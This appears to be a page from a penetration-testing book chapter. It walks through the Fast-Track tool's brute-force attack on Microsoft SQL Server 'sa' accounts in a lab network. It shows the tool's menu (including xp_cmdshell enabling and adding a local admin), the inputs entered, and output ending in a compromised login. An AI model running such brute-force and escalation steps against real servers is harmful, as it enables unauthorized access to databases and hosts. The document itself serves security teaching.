background image

170

Chapter 11

You can use and customize several options to reach your target, the easi-

est of which is the quick brute force, which will often go undetected. We’ll 
select the quick brute force option using a subset of built-in passwords and 
attempt to guess the password on the MS SQL server.

Enter the IP Address and Port Number to Attack.

 

Options: (a)ttempt SQL Ping and Auto Quick Brute Force

           (m)ass scan and dictionary brute
           (s)ingle Target (Attack a Single Target with big dictionary)
           (f)ind SQL Ports (SQL Ping)
           (i) want a command prompt and know which system is vulnerable
           (v)ulnerable system, I want to add a local admin on the box...
           (e)nable xp_cmdshell if its disabled (sql2k and sql2k5)

  Enter Option: 

a

 Enter username for SQL database (example:sa): 

sa

Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...

 Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255): 

10.211.55.1/24

Do you want to perform advanced SQL server identification on non-standard SQL 
ports? This will use UDP footprinting in order to determine where the SQL 
servers are at. This could take quite a long time.

 Do you want to perform advanced identification, yes or no: 

yes

[-] Launching SQL Ping, this may take a while to footprint.... [-]

[*] Please wait while we load the module tree...
Brute forcing username: sa

Be patient this could take awhile...

Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of  on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433

SQL Server Compromised: "sa" with password of: "password" on IP 
10.211.55.128:1433

Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433